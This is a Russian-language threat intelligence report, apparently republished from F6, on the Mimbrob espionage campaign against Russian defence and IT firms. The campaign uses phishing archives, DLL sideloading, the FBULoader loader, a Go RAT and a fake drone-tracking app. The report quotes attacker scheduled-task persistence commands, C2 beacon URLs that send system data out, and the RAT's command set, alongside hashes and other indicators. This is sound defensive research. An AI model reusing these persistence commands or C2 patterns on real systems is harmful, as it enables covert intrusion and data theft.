«Баба-яга» на крючке: новая активность Mimbrob нацелена на российский ВПК и IT-компании


В апреле 2026 года специалисты департамента киберразведки (Threat Intelligence) компании F6 обнаружили волну вредоносной активности. Достаточных оснований для того, чтобы атрибутировать эту активность какой-либо из ранее известных киберпреступных группировок, не было. Атакующие рассылали фишинговые письма с архивами, нацеленные на организации в авиакосмической промышленности. Содержимое архивов включало в себя легитимный исполняемый файл (чаще всего Яндекс Браузера) и вредоносную DLL, загружаемую с помощью техники DLL Sideloading. Командные серверы атакующих мимикрировали под технические домены Yandex, а адреса отправителей писем – под реальные организации. Специалисты F6 Threat Intelligence присвоили группе название Mimbrob – mim по мимикрии в доменах и файлах, br – от использования браузеров в атаках, rob – от найденного на скомпрометированном домене логотипа.
Атакующие впервые проявили активность в апреле 2026 года, параллельно распространяя через фишинговые письма ВПО на Go и загрузчик FBULoader. Затем в мае злоумышленники через свой сайт распространяли загрузчик FBULoader под видом приложения Dronner для отслеживания дронов типа «Баба-яга». С начала сентября группировка возобновила активность и распространяет фишинговые письма на тему судебных разбирательств, нацеленные на IT-компании.
Судя по выбору целей и качеству составления фишинговых писем для рассылок, вероятная цель атакующих – шпионаж. Так как финальная нагрузка в ходе исследования не была получена, более точные выводы о мотивации остаются в области предположений.
Поскольку атакующие параллельно распространяли и DLL-загрузчик FBULoader, и ВПО на Go, далее будет описана каждая из цепочек атаки.
Фишинговые письма и FBULoader
Наиболее ранний из зафиксированных образцов активности группировки относится к 22 апреля 2026 года. Цепочка атаки начинается с фишингового письма, отправленного в российское предприятие, которое занимается созданием авиационных и ракетных двигателей. Отправитель письма предположительно был скомпрометирован, так как домен отправителя принадлежит легитимной компании, занимающейся оптоэлектронными системами измерения.
Письмо замаскировано под служебную записку о необходимости срочного проведения метрологической проверки всей продукции предприятия и обновления специализированного ПО. Текст письма выдержан в официально-деловом стиле, содержит ссылки на федеральные законы и нормативные акты, которые относятся к теме сообщения, при этом в нём нет ошибок.

Письмо содержит архив «Поверка [название предприятия] 22.04.rar». В архиве находятся несколько переименованных легитимных файлов Яндекс Браузера, и в папке 25.0.1364.13754 – вредоносная DLL. При запуске любого из исполняемых файлов, легитимный файл подгрузит вредоносную DLL browser.dll с помощью техники DLL Sideloading. Сама DLL является загрузчиком, который специалистами F6 был назван FBULoader (аббревиатура от Fake Browser Update Loader – фальшивый загрузчик обновления браузера), поскольку во всех обнаруженных сэмплах использовался файл браузера, а домены мимикрировали под его инфраструктуру.
![Рисунок 2 – Содержимое архива «Поверка [название предприятия] 22.04.rar» Содержимое архива «Поверка [название предприятия] 22.04.rar»: переименованные файлы Яндекс Браузера и папка с вредоносной DLL](https://habrastorage.org/r/w1560/getpro/habr/upload_files/890/c2d/532/890c2d532997ebfd793f15a73afdc782.png)
На тему «поверки» было найдено еще два архива: «Poverka2026.zip» и «na_otsos.rar». Оба архива содержали тот же легитимный файл Яндекс Браузера и вредоносные DLL-загрузчики.
4 мая 2026 года системой F6 MXDR были заблокированы еще несколько рассылок, направленных в исследовательский институт. Рассылка проводилась с адреса v.kichenko@klirnov.ru. Домен klirnov[.]ru принадлежит атакующим и мимикрирует под российского разработчика в авиационной сфере.
![Рисунок 3 – Фишинговая рассылка от 4 мая Фишинговая рассылка от 28 апреля с адреса на домене klirnov[.]ru](https://habrastorage.org/r/w1560/getpro/habr/upload_files/391/a2b/420/391a2b420798bdf5ed0352549a2cedb8.png)
Письмо аналогично содержит вложение-архив «Dogovor_01.04.rar». Структура архива такая же, как и во всех обнаруженных сэмплах: легитимный переименованный файл Яндекс Браузера и в папке 25.0.1364.13754 (название в зависимости от версии браузера) – вредоносная DLL.


Фишинговые атаки с использованием FBULoader были зафиксированы с 22 апреля по 8 мая, новая волна – с 3 сентября по настоящее время. В сентябре системой F6 MXDR были заблокированы письма, направленные в адрес нескольких ИТ-компаний. Письма отправлены с электронного адреса admin@npkarns[.]ru, домен npkarns[.]ru мимикрирует под домен российского научно-производственного предприятия. Стоит отметить, что все три домена, которые атакующие сами создавали для отправки писем, были зарегистрированы в один день – 16 апреля 2026 года. В качестве вложения были прикреплены архивы с именами «Судебное_разбирательство[дата].rar», которые, аналогично предыдущим, содержали легитимный исполняемый файл и вредоносную DLL.

Далее предоставлен разбор цепочки атаки с DLL-загрузчиком FBULoader на примере архива «Dogovor_01.04.rar». Все перечисленные выше архивы приводят к аналогичной цепочке заражения с разницей в С2-серверах. В индикаторах компрометации приведены все обнаруженные архивы и их содержимое, а также связанные С2-адреса.
Имя файла | MD5 | Описание |
|---|---|---|
Dogovor_01.04.rar | 4a1c0fe99341908b2930de2ad2ec2522 | Архив |
Perechen_komponentov_dlya_kooperatsii_BP-XXX_i_privody.exeTekhnicheskie_trebovaniya_k_komponentam_TU_i_STO.exeProekt_soglasheniya_o_kooperatsii_i_primernyy_grafik_postavok.exePredlozhenie_o_sotrudnichestve_po_proizvodstvu_komponentov_2026.exe | 900ce1d4bcd1510276c4263d4aa3d78d | Легитимный файл Яндекс Браузера |
browser.dll | 4ca176d7f26664fc0f03c8289762f1c4 | Вредоносная DLL, загружаемая с помощью техники DLL Sideloading |
browser.dll | 0426d58893826924324fd95ad76f4c97 | Полезная нагрузка из DLL, С2: checker[.]yandex-update[.]ru |
В архиве под разными именами содержатся несколько исполняемых файлов браузера, подписанных легитимной цифровой подписью Yandex. Имена файлов маскируются под деловые документы: перечень компонентов, предложение о сотрудничестве, проект соглашения, технические требования. Запуск любого из этих файлов приводит к реализации DLL Sideloading библиотеки browser.dll из директории 25.0.1364.13754, которая поставляется вместе с остальными .exe файлами в архиве.

Загружаемая вредоносная библиотека browser.dll создает директорию C:\Users\{username}\AppData\Roaming\Yandex\YaBrowser, копирует в нее изначально запущенный .ехе под именем browser.exe, создает директорию C:\Users\{username}\AppData\Roaming\Yandex\YaBrowser\25.0.1364.13754 и извлекает из browser.dll полезную нагрузку, записывая ее под именем browser.dll.
Далее извлекает файл-приманку «Perechen_komponentov_dlya_kooperatsii_BP.pdf» во временную директорию и открывает ее. Параллельно создается задача в планировщике задач с названием «Browser Update Checker» на запуск C:\Users\{username}\AppData\Roaming\Yandex\YaBrowser\browser.exe каждые 15 минут.

Запланированная задача в свою очередь запускает извлеченный browser.dll из директории C:\Users\{username}\AppData\Roaming\Yandex\YaBrowser\25.0.1364.13754. Он расшифровывает URL hxxps://checker[.]yandex-update[.]ru/api/verify/. Алгоритм расшифровки кастомный: последовательная обработка каждого символа с помощью битовых операций над двумя байтами из таблицы зашифрованных данных и циклически повторяющегося ключа. Загрузчик собирает информацию о системе – hwid, версию ОС, имя PC, имя пользователя, число ядер процессора – и отправляет ее следующим запросом:
hxxps://checker[.]yandex-update[.]ru/api/verify/?current=25.2.64.1&p=c&sa=9&wv={oc_num_version}&wvhr=Windows{oc_version}&hwid={hwid}&u={pc_name}%5C{username}В ответ загрузчик ожидает получение новой полезной нагрузки с последующим инжектом в текущий процесс и запуском. В ходе исследования не удалось получить или обнаружить следующую стадию.
Фишинговые письма и RAT-Go
Параллельно с фишинговыми рассылками с FBULoader, группировка распространяла другое ВПО, названное атакующими RAT-Go. Поскольку мы обнаружили всего три образца данного ВПО в апреле, далее оно будет обозначено так же, как во внутреннем проекте атакующих. Указанная полезная нагрузка была зафиксирована с 24 по 28 апреля.
Цепочка атаки начиналась с фишингового письма с архивом. В качестве отправителя письма использовалась личность реального сотрудника научного института, а домен мимикрировал под оригинальный – vniirn[.]ru. Сообщение было замаскировано под предложение о сотрудничестве.

Всего удалось обнаружить три таких архива: «Зарплаты.rar», «Новые.rar» и «Перечень_компонентов_и_технические_требования.rar» (вложение письма из примера выше).
Первые два архива, «Зарплаты.rar» и «Новые.rar», содержали одинаковый легитимный файл Notepad++ и вредоносную DLL. Также архив «Зарплаты.rar» содержал документ-приманку, которая использовалась и при распространении FBULoader.



Имя файла | MD5 | Описание |
|---|---|---|
Новые.rar | 25334e01a65c5bb07048ad6d74592d8a | Архив |
Зарплаты.rar | 9282c4a105f1b6d32212f836debf21b2 | Архив |
Измененный договор.exe / Ведомость.exe | 512f4350aee7eb50adf509008a3ad3ce | Легитимный файл notepad++ |
MSASN1.dll | 9a0901dc40fb4695672cb21681c94bf6 | Вредоносная DLL, загружаемая с помощью техники DLL Sideloading |
Открытие исполняемого файла из архива (который на самом деле является переименованным Notepad++) приводит к загрузке вредоносной библиотеки MSASN1.dll с помощью техники DLL Sideloading.
Вредоносная MSASN1.dll содержит закодированную в Base64 нагрузку. Вызов функции run_base64_payload для расшифровки и запуска данной нагрузки реализован в DllMain. Расшифрованная нагрузка сохраняется по пути: C:\Users\{username}\AppData\Local\Temp с именем chr{4}[a-zA-Z0-9].tmp. Стоит отметить, что при анализе сэмпла была найдена строка "ТУТ_ВСТАВЬ_СВОЙ_BASE64":

Промежуточная нагрузка chr{4}[a-zA-Z0-9].tmp формирует два пути – C:\Users\{username}\AppData\Roaming\Microsoft\Windows и C:\Users\{username}\AppData\Local\Temp – и декодирует из Base64 конечную полезную нагрузку и отвлекающий PDF. Конечная нагрузка сохраняется как diskmanager.exe в C:\Users\{username}\AppData\Roaming\Microsoft\Windows, а отвлекающий PDF – как document.pdf во временной директории. Файл document.pdf при открытии оказывается нечитаемым. Причина в том, что он был дважды закодирован в Base64, тогда как декодирование выполняется только один раз. При корректном двойном декодировании содержимое совпадает с документом «Ведомость начислений.pdf», то есть приманка задумывалась как рабочий файл, но из-за ошибки в логике так и не открывается у жертвы. После развертывания в планировщике задач создается задача DiskManager, запускающая diskmanager.exe с интервалом в одну минуту.
schtasks /create /tn DiskManager /tr C:\Users\admin\AppData\Roaming\Microsoft\Windows\diskmanager.exe /sc minute /mo 1 /fФайл diskmanager.exe представляет собой клиентскую часть RAT, написанную на Go. При анализе были обнаружены строки rat_go_common_* и /home/kali/Desktop/v1_deploy_fix/war_22.11/rat-go/*, а также отладочные пути /home/kali/.gvm/go1.20/src/runtime/..., указывающие на компиляцию в системе с пользователем kali и использованием GVM и Go 1.20. При инициализации он настраивает AES-GCM для шифрования трафика, используя встроенный ключ, после чего входит в бесконечный цикл попыток установить TCP-соединение с C2 82[.]38[.]63[.]88:6969. Попытки повторяются до успеха, между ними выдерживается пауза в пять секунд. После установления соединения RAT переходит в цикл обработки команд. Формат команд: четыре байта типа команды, затем тело команды. Например, последовательность 00 00 00 00 64 69 72 соответствует пользовательскому вводу 0dir. Поддерживаются четыре типа команд:
Код | Наименование | Описание |
|---|---|---|
0 | cmd_exec | Запуск командной строки (cmd.exe) с последующим выполнением переданной команды. Результат отправляется обратно на C2. |
1 | upload | Прием файла от C2 и запись его на диск жертвы (загрузка на хост). |
2 | download | Чтение файла с файловой системы жертвы и отправка его на C2 (выгрузка с хоста). |
3 | disconnect | Закрытие соединения с C2. |
При анализе нам удалось обнаружить следующие команды, отправленные атакующими во время работы сэмплов:
echo ping
systeminfo
В еще одном архиве, «Перечень_компонентов_и_технические_требования.rar», цепочка атаки была слегка изменена. Вместо Notepad++ в качестве легитимного файла снова используется Яндекс Браузер, заражение также реализуется через DLL Sideloading – на этот раз подгружается библиотека 32.0.1700.12599\browser.dll.
Отличие от предыдущей атаки заключается в том, что промежуточный файл (по типу chr{4}[a-zA-Z0-9].tmp) отсутствует. Файл browser.dll извлекает основную полезную нагрузку под именем yandex_service.exe напрямую. Также задача в планировщике теперь называется YandexUpdate:
schtasks.exe /create /tn YandexUpdate /tr C:\Users\Daren\AppData\Roaming\Microsoft\Windows\yandex_service.exe /sc minute /mo 1 /fИ в yandex_service.exe все значимые строки (IP, порт, путь для сохранения файлов, аргументы командной оболочки) теперь хранятся в зашифрованном виде (для расшифровки используется AES-GCM). С2 в данном случае был 194.87.37[.]14:443.
Распространение FBULoader под видом приложения Dronner
В ходе исследования специалистами F6 был найден сайт dronner[.]ru, зарегистрированный 11 мая 2026 года. С него распространялось десктопное приложение Dronner, по описанию сайта, якобы предназначенное для получения информации и отслеживания дронов типа «Баба-яга» (тяжёлые беспилотники, переделанные из сельскохозяйственных, которые ВСУ используют в боевых целях, в том числе для дистанционного минирования).
Судя по описанию на сайте-приманке, приложение якобы позволяет получать информацию о местах пролёта таких дронов и точках минирования. Такая информация может быть актуальна для подразделений, которые действуют вблизи линии боевого соприкосновения – следовательно, можно предположить, что атака с использованием вредоносного приложения Dronner нацелена на российских военнослужащих.
![Рисунок 14 – Содержимое сайта dronner[.]ru Сайт-приманка dronner[.]ru с описанием приложения Dronner](https://habrastorage.org/r/w1560/getpro/habr/upload_files/556/7fc/9f2/5567fc9f21570a69d81752e98e2af0b8.png)
На момент исследования с сайта скачивался файл DronnerInstaller_2.8.5.exe. При запуске открывалось приложение-заглушка с таким содержимым.

Файл упакован с помощью инструмента WiX Toolset. При запуске извлекается основной установщик dronner.msi.
dronner.msi -> browser.exe + browser_elf.dll -> C:\Users\{username}\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad (легитимные файлы) + C:\Users\{username}\AppData\Local\Microsoft\Edge Browser Dev (browser.exe + другой browser_elf.dll)Установщик создает 2 директории: C:\Users\{username}\AppData\Roaming\Dronner и C:\Users\{username}\AppData\Local\Temp\0f27c12e\, в последнюю извлекает browser.exe и browser_elf.dll. После завершения установки запускается browser.exe.
При запуске browser.exe вызывается функция SignalChromeElf из библиотеки 16.10.0.2564/browser_elf.dll. В отличии от ранее изученных атак, в данном случае нет реализации DLL Sideloading. Вместо этого библиотека browser_elf.dll присутствует в таблице импорта файла browser.exe и функция SignalChromeElf вызывается явно.
Стоит отметить, что browser_elf.dll имеет 13 экспортируемых функций. За исключением стандартной DllEntryPoint, все функции ведут по 1 адресу, следовательно библиотека экспортирует 1 функцию под разными именами.

Далее происходит проверка окружения:
Сэмпл получает информацию о языке системы, предпочитаемых языках интерфейса и установленных раскладках клавиатуры. Список регионов: "ru", "uk", "be", "uz", "kk", "az", "hy", "ka", "ky", "tg", "tk", "ro" (СНГ + Румыния). В случае обнаружения хотя бы одного из списка – сэмпл продолжает работу.
Проверяет текущие права. Если сэмпл запущен без повышенных прав – работа продолжается. Это делается для обхода песочниц, поскольку как правило, песочницы запускают сэмплы с правами администратора.
Во всех остальных случаях сэмпл переходит в sleep на 3 минуты и завершает работу.
Далее создается директория C:\Users\{username}\AppData\Local\Microsoft\Edge Browser Dev, куда копируются browser.exe и распаковывается другая версия browser_elf.dll. Файл browser.exe закрепляется в планировщике с названием CocCoc Browser Update, выполняется каждые 10 минут.
Запуск browser.exe и новой версии browser_elf.dll: также вызывается функция SignalChromeElf из browser_elf.dll; аналогично проводится проверка окружения. Далее происходит сбор информации о системе: архитектура процессора, версия OC, версия сборки OC, серийный номер текущего диска, hwid системы, имя ПК, имя пользователя. Формируется запрос на С2: browser[.]ydx-stat[.]ru. Полный URL:
hxxps://browser[.]ydx-stat[.]ru/api/r/?bid=eb260e0e&sa=9&wv={OC_Version}&wvhr={OC_Build_Version}&hwid={Disk_Serial_and_hwid}&u={username}%5C{pcname}где:
bid – ID сэмпла
sa – архитектура процессора
wv – версия ОС
wvhr – версия билда ОС
hwid – серийный номер диска + hwid системы
u – имя пользователя и ПК
После сэмпл получает от С2 зашифрованную полезную нагрузку. Алгоритм шифрования такой же, как и при расшифровке строк в сэмпле: модификация RC4 с блоком размером 94. Однако для расшифровки полезной нагрузки, полученной от C2, дополнительно используется ключ, вшитый в первые 8 байт нагрузки.
Подробности исследования, сетевой инфраструктуры атакующих, индикаторы компрометации можно найти в блоге на сайте F6.
KioskNews shows a cleaned-up reading view extracted from the publisher’s page — the original always lives on their site, not ours.